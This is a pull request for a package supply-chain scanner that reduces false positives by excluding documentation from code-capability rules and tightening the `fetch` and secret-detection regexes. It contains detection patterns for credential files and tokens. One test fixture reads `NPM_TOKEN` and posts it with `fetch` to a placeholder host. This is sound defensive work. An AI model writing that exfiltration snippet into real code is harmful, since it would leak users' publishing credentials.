### PR TITLE
[codex] Reduce scan false positives

### DIFF
--- a/docs/security-detection-corpus.md
+++ b/docs/security-detection-corpus.md
@@ -14,6 +14,7 @@ The fixture taxonomy is based on the current Drydock rule surface plus public np
 - Recent npm detection benchmark research reports a curated dataset of 6,420 malicious and 7,288 benign npm packages, with 11 behavior categories and 8 evasion categories. The most common behaviors were command execution, data collection, and data exfiltration; install scripts were used by about 72% of malicious packages in that study, and preinstall hooks were the dominant install-time entry point.
 - The same benchmark highlights the central detection trade-off: benign and malicious packages often call the same APIs. A single `process.env` or `https` use is capability evidence, while chains such as collect → serialize → exfiltrate are stronger intent evidence.
 - Network-only code follows that trade-off: unchanged network-only files are suppressed as package context, added network-only files remain medium-severity contextual evidence, and added network access escalates to high when it is tied to lifecycle scripts, process execution, dynamic evaluation, or credential access.
+- Documentation and prose files remain available as package evidence, but deterministic `code.*` rules do not treat them as executable capability evidence. Secret checks in documentation use only high-confidence token formats; generic key/value examples such as `token = localStorage.getItem("token")` are not `file.secret-content` findings.
 
 ## Safety policy
 
@@ -95,7 +96,7 @@ A PyPI review runs two rule families over the staged artifacts:
 
 - `pypi.*` findings come from `pyPiReleaseFindings` and carry `PYPI_RULES_VERSION` (currently `0.2.0`).
 - shared `file.*` / `code.*` / `diff.*` findings come from `deterministicFindings` and carry
-  `DETERMINISTIC_RULES_VERSION` (currently `1.6.1`).
+  `DETERMINISTIC_RULES_VERSION` (currently `1.6.2`).
 
 The harness asserts this per family: every `pypi.*` finding must equal `PYPI_RULES_VERSION` and every
 other finding must equal `DETERMINISTIC_RULES_VERSION`. Bump the relevant constant **and** update the
@@ -104,7 +105,10 @@ fixtures in the same PR whenever a rule family's coverage changes (`PYPI_RULES_V
 Python-aware matching in `1.6.0` (subprocess/os.system, urllib.request/requests/socket,
 exec/`__import__`/base64-decode, os.environ/getpass/keyring) while npm keeps the JavaScript matcher;
 the same Python matcher must be used when annotating modified-file findings so release-risk
-classification stays consistent for extensionless Python files. `pypi.*` grew `startup-hook`,
+classification stays consistent for extensionless Python files. `1.6.2` excludes documentation from
+shared `code.*` capability findings, narrows JavaScript `fetch` matching to calls rather than class
+method declarations, and limits documentation secret-content matches to high-confidence token formats.
+`pypi.*` grew `startup-hook`,
 `record-mismatch`, and `unusual-dependency` in `0.2.0`, and
 `setup-install-command` was upgraded to fire on the top-level sdist `setup.py` install-time code, not
 just `cmdclass`.

--- a/server/lib/review-rules/file-types.ts
+++ b/server/lib/review-rules/file-types.ts
@@ -1,0 +1,24 @@
+const DOCUMENTATION_EXTENSIONS = new Set(["adoc", "asciidoc", "markdown", "md", "mdx", "rst"]);
+const DOCUMENTATION_BASENAMES = new Set([
+  "authors",
+  "changelog",
+  "changes",
+  "code_of_conduct",
+  "contributors",
+  "copying",
+  "history",
+  "license",
+  "licence",
+  "notice",
+  "readme",
+  "security",
+]);
+
+export function isDocumentationPath(path: string): boolean {
+  const basename = path.replaceAll("\\", "/").split("/").at(-1)?.toLowerCase() ?? "";
+  if (!basename) return false;
+
+  const dot = basename.lastIndexOf(".");
+  if (dot > 0 && DOCUMENTATION_EXTENSIONS.has(basename.slice(dot + 1))) return true;
+  return DOCUMENTATION_BASENAMES.has(dot > 0 ? basename.slice(0, dot) : basename);
+}

--- a/server/lib/review-rules/file-types.ts
+++ b/server/lib/review-rules/file-types.ts
@@ -20,5 +20,6 @@ export function isDocumentationPath(path: string): boolean {
 
   const dot = basename.lastIndexOf(".");
   if (dot > 0 && DOCUMENTATION_EXTENSIONS.has(basename.slice(dot + 1))) return true;
-  return DOCUMENTATION_BASENAMES.has(dot > 0 ? basename.slice(0, dot) : basename);
+  if (dot > 0) return false;
+  return DOCUMENTATION_BASENAMES.has(basename);
 }

--- a/server/lib/review-rules/helpers.ts
+++ b/server/lib/review-rules/helpers.ts
@@ -1,6 +1,6 @@
 import type { Finding } from "../review";
 import { firstMatchingLine } from "../text-utils";
-import { SECRET_PATTERNS } from "./patterns";
+import { HIGH_CONFIDENCE_SECRET_PATTERNS, SECRET_PATTERNS } from "./patterns";
 import { DETERMINISTIC_RULE_IDS, type DeterministicRuleKey } from "./rule-ids";
 
 // Family modules tag findings with a rule ID only; the deterministic ruleset
@@ -13,19 +13,30 @@ export function tag(
   return { ...finding, ruleId: DETERMINISTIC_RULE_IDS[rule] };
 }
 
-export function containsSecretLikeText(text: string): boolean {
-  return SECRET_PATTERNS.some(([pattern]) => {
+interface SecretTextOptions {
+  highConfidenceOnly?: boolean;
+}
+
+export function containsSecretLikeText(text: string, options: SecretTextOptions = {}): boolean {
+  return secretPatternsFor(options).some(([pattern]) => {
     pattern.lastIndex = 0;
     return pattern.test(text);
   });
 }
 
-export function firstSecretLine(text: string | undefined | null): number | undefined {
+export function firstSecretLine(
+  text: string | undefined | null,
+  options: SecretTextOptions = {},
+): number | undefined {
   if (!text) return undefined;
   return firstMatchingLine(
     text,
-    SECRET_PATTERNS.map(([pattern]) => pattern),
+    secretPatternsFor(options).map(([pattern]) => pattern),
   );
+}
+
+function secretPatternsFor(options: SecretTextOptions): Array<[RegExp, string]> {
+  return options.highConfidenceOnly ? HIGH_CONFIDENCE_SECRET_PATTERNS : SECRET_PATTERNS;
 }
 
 export function firstJsonPropertyLine(

--- a/server/lib/review-rules/index.ts
+++ b/server/lib/review-rules/index.ts
@@ -15,7 +15,7 @@ import { dependencyDiffFindings } from "./deps";
 // way that should invalidate cached scan reports. Stored alongside each finding
 // so historical reports can be traced back to the ruleset that produced them.
 // Lives here (not in a family module) because versioning spans every family.
-export const DETERMINISTIC_RULES_VERSION = "1.6.1";
+export const DETERMINISTIC_RULES_VERSION = "1.6.2";
 
 export { DETERMINISTIC_RULE_IDS } from "./rule-ids";
 export {
@@ -24,6 +24,7 @@ export {
   PYTHON_PATTERN_SET,
   PYTHON_EXECUTION_CAPABILITY_PATTERNS,
   SECRET_PATTERNS,
+  HIGH_CONFIDENCE_SECRET_PATTERNS,
 } from "./patterns";
 export { safeJson } from "./helpers";
 export type { DeterministicFindingOptions } from "./context";

--- a/server/lib/review-rules/metadata.ts
+++ b/server/lib/review-rules/metadata.ts
@@ -2,6 +2,7 @@ import { isOutsidePackageFilesAllowlist } from "../review-package-files";
 import type { Finding } from "../review";
 import { containsSecretLikeText, firstSecretLine, tag } from "./helpers";
 import { changedPrefix, type RuleContext } from "./context";
+import { isDocumentationPath } from "./file-types";
 
 // Manifest integrity and secret-exposure rules: parse failures, secret-looking
 // files, files outside the declared allowlist, and credential files added to
@@ -28,13 +29,17 @@ export function metadataFindings(ctx: RuleContext): Finding[] {
     const sample = file.textSample || "";
     const prefix = changedPrefix(ctx, file.path);
     const changed = ctx.diffByPath.get(file.path)?.status;
+    const secretOptions = { highConfidenceOnly: isDocumentationPath(file.path) };
 
-    if (/\.npmrc|\.env|id_rsa|id_ed25519/i.test(file.path) || containsSecretLikeText(sample)) {
+    if (
+      /\.npmrc|\.env|id_rsa|id_ed25519/i.test(file.path) ||
+      containsSecretLikeText(sample, secretOptions)
+    ) {
       findings.push(
         tag("fileSecretContent", {
           severity: changed === "added" ? "critical" : "high",
           file: file.path,
-          line: firstSecretLine(sample),
+          line: firstSecretLine(sample, secretOptions),
           evidence: `${prefix}secret-looking file or content`,
           reason: "published artifacts should not include credentials or private material",
         }),

--- a/server/lib/review-rules/patterns.ts
+++ b/server/lib/review-rules/patterns.ts
@@ -25,7 +25,8 @@ const PYTHON_PROCESS_EXECUTION_PATTERNS = [
 const JS_NETWORK_ACCESS_PATTERNS = [
   /\brequire\(["'](?:node:)?(?:http|https|net|dns)["']\)/,
   /\bfrom\s+["'](?:node:)?(?:http|https|net|dns)["']/,
-  /\bfetch\s*\(/,
+  /\b(?:global|globalThis|self|window)\.fetch\s*\(/,
+  /(?<![\w$.])fetch\s*\((?![^\n;]*\)\s*\{)/,
   /\bXMLHttpRequest\b/,
   /\baxios\s*\./,
 ];
@@ -117,11 +118,22 @@ export const SECRET_PATTERNS: Array<[RegExp, string]> = [
     "[REDACTED_PRIVATE_KEY]",
   ],
   [/(authorization\s*[:=]\s*)['"]?Bearer\s+[A-Za-z0-9._\-+/=]{16,}/gi, "$1[REDACTED_BEARER]"],
-  [
-    /(?<![A-Za-z0-9])((?:secret|token|password|passwd|pwd|api[_-]?key|access[_-]?key|client[_-]?secret)\s*[:=]\s*)['"]?[^'"\s]{12,}(?=$|[\s'",;}\]])/gi,
-    "$1[REDACTED_SECRET]",
-  ],
+  ...genericSecretPatterns(),
 ];
+
+export const HIGH_CONFIDENCE_SECRET_PATTERNS: Array<[RegExp, string]> = SECRET_PATTERNS.slice(
+  0,
+  -1,
+);
+
+function genericSecretPatterns(): Array<[RegExp, string]> {
+  return [
+    [
+      /(?<![A-Za-z0-9])((?:secret|token|password|passwd|pwd|api[_-]?key|access[_-]?key|client[_-]?secret)\s*[:=]\s*)['"]?[^'"\s()]{12,}(?=$|[\s'",;}\]])/gi,
+      "$1[REDACTED_SECRET]",
+    ],
+  ];
+}
 
 export function codePatternsFor(codePatternSet: CodePatternSet | undefined): typeof JS_PATTERN_SET {
   return codePatternSet === "python" ? PYTHON_PATTERN_SET : JS_PATTERN_SET;

--- a/server/lib/review-rules/scripts.ts
+++ b/server/lib/review-rules/scripts.ts
@@ -4,6 +4,7 @@ import type { Finding } from "../review";
 import { LIFECYCLE_SCRIPTS } from "./patterns";
 import { firstJsonPropertyLine, tag } from "./helpers";
 import { changedPrefix, type RuleContext } from "./context";
+import { isDocumentationPath } from "./file-types";
 
 // Install lifecycle hooks and in-file code-execution capability: the scripts and
 // code paths that run on, or are pulled in by, a consumer install.
@@ -43,6 +44,8 @@ export function scriptFindings(ctx: RuleContext): Finding[] {
   }
 
   for (const file of ctx.files) {
+    if (isDocumentationPath(file.path)) continue;
+
     const sample = file.textSample || "";
     const prefix = changedPrefix(ctx, file.path);
     const changed = ctx.diffByPath.get(file.path)?.status;

--- a/test/policy.test.mjs
+++ b/test/policy.test.mjs
@@ -24,7 +24,7 @@ describe("deterministic policy", () => {
     expect(findings.filter((finding) => finding.severity === "high")).toHaveLength(2);
   });
 
-  test("prompt injection text remains just evidence", () => {
+  test("prompt injection text in docs remains just evidence", () => {
     const files = [
       {
         path: "README.md",
@@ -37,8 +37,6 @@ describe("deterministic policy", () => {
     ];
     const findings = deterministicFindings(files, createPackageDiff([], files));
 
-    expect(findings.map((finding) => finding.evidence)).toEqual([
-      "new/changed added file: secret/environment access",
-    ]);
+    expect(findings).toEqual([]);
   });
 });

--- a/test/redaction.test.mjs
+++ b/test/redaction.test.mjs
@@ -46,4 +46,9 @@ describe("secret redaction", () => {
     expect(out).toContain("password: [REDACTED_SECRET]");
     expect(out).not.toContain("abc!def@ghi#jkl");
   });
+
+  test("does not redact token getter calls as generic secrets", () => {
+    const source = 'const token = localStorage.getItem("token");';
+    expect(redactText(source)).toBe(source);
+  });
 });

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -167,6 +167,79 @@ describe("review", () => {
     );
   });
 
+  test("does not treat fetch method declarations as network access", () => {
+    const previous = [
+      {
+        path: "core/ObservableQuery.js",
+        size: 90,
+        sha256: "old",
+        flags: [],
+        textSample:
+          "export class ObservableQuery {\n  fetchPolicy() { return 'cache-first'; }\n}\n",
+      },
+    ];
+    const staged = [
+      {
+        path: "core/ObservableQuery.js",
+        size: 180,
+        sha256: "new",
+        flags: [],
+        textSample:
+          "export class ObservableQuery {\n  fetchPolicy() { return 'cache-first'; }\n  fetch(options, networkStatus, fetchQuery) {\n    return fetchQuery(options, networkStatus);\n  }\n}\n",
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff(previous, staged));
+
+    expect(findings.some((finding) => finding.ruleId === "code.network-access")).toBe(false);
+  });
+
+  test("does not scan documentation as executable capability evidence", () => {
+    const staged = [
+      {
+        path: "CHANGELOG.md",
+        size: 160,
+        sha256: "changelog",
+        flags: [],
+        textSample:
+          "Previously no AbortController was passed to `fetch()`, so the request kept running.\n",
+      },
+      {
+        path: "skills/apollo-client/references/integration-client.md",
+        size: 160,
+        sha256: "skill-doc",
+        flags: [],
+        textSample:
+          'const token = localStorage.getItem("token");\nauthorization: token ? `Bearer ${token}` : ""\n',
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged));
+
+    expect(findings.some((finding) => finding.ruleId?.startsWith("code."))).toBe(false);
+    expect(findings.some((finding) => finding.ruleId === "file.secret-content")).toBe(false);
+  });
+
+  test("still flags high-confidence token leaks in documentation", () => {
+    const staged = [
+      {
+        path: "README.md",
+        size: 80,
+        sha256: "readme-token",
+        flags: [],
+        textSample: "Do not publish this npm_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA token.\n",
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged));
+
+    expect(findings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: "file.secret-content",
+          file: "README.md",
+        }),
+      ]),
+    );
+  });
+
   test("does not flag secret-looking source map content", () => {
     // The tar parser strips text samples from .map files (shouldSkipTextSample),
     // so deterministic rules never see source-map contents.

--- a/test/review.test.mjs
+++ b/test/review.test.mjs
@@ -240,6 +240,33 @@ describe("review", () => {
     );
   });
 
+  test("still scans executable files with documentation-like basenames", () => {
+    const staged = [
+      {
+        path: "security.js",
+        size: 120,
+        sha256: "security-script",
+        flags: [],
+        textSample:
+          "const token = process.env.NPM_TOKEN;\nfetch('https://example.invalid', { body: token });\n",
+      },
+    ];
+    const findings = deterministicFindings(staged, createPackageDiff([], staged));
+
+    expect(findings).toEqual(
+      expect.arrayContaining([
+        expect.objectContaining({
+          ruleId: "code.credential-access",
+          file: "security.js",
+        }),
+        expect.objectContaining({
+          ruleId: "code.network-access",
+          file: "security.js",
+        }),
+      ]),
+    );
+  });
+
   test("does not flag secret-looking source map content", () => {
     // The tar parser strips text samples from .map files (shouldSkipTextSample),
     // so deterministic rules never see source-map contents.

--- a/test/scan-pipeline-phases.test.mjs
+++ b/test/scan-pipeline-phases.test.mjs
@@ -104,7 +104,7 @@ function makeAdapter(overrides = {}) {
         reason: "credential-like content on a changed line",
         line: 2,
         ruleId: "code.credential-access",
-        ruleVersion: "1.6.1",
+        ruleVersion: "1.6.2",
       },
     ]),
     describe: vi.fn(() => ({


### PR DESCRIPTION
Reduces deterministic scan false positives by skipping docs and prose for code capability findings, narrowing JavaScript `fetch` matching so method declarations are not treated as network calls, and limiting docs secret checks to high-confidence token formats. This fixes noisy Apollo-style findings from Markdown examples, changelog prose, and `ObservableQuery.fetch` declarations while still flagging real token leaks. It bumps deterministic rules to `1.6.2` and documents the rule semantics. Validation: `pnpm run verify`.